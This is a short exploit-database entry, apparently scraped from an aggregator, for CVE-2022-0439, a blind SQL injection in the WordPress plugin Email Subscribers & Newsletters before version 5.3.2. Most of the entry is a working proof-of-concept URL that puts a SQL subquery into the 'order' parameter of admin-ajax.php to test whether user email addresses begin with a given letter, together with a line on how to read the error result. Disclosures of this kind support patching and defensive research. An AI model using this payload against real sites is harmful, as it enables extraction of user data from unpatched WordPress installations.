Exploit for Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection CVE-2022-0439

Name: Exploit for Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection CVE-2022-0439
Rating: 5 (169 reviews)

2022-02-11 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:729D3E67-D081-4A4E-AC1E-F6B0A184F095
http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ajax_fetch_report_list&order=,%20(select%201%20from%20wp_users%20where%20user_email%20like%200x6725%20union%20select%202)%20--%20g

This will return an error result if there is an e-mail starting with g in the database.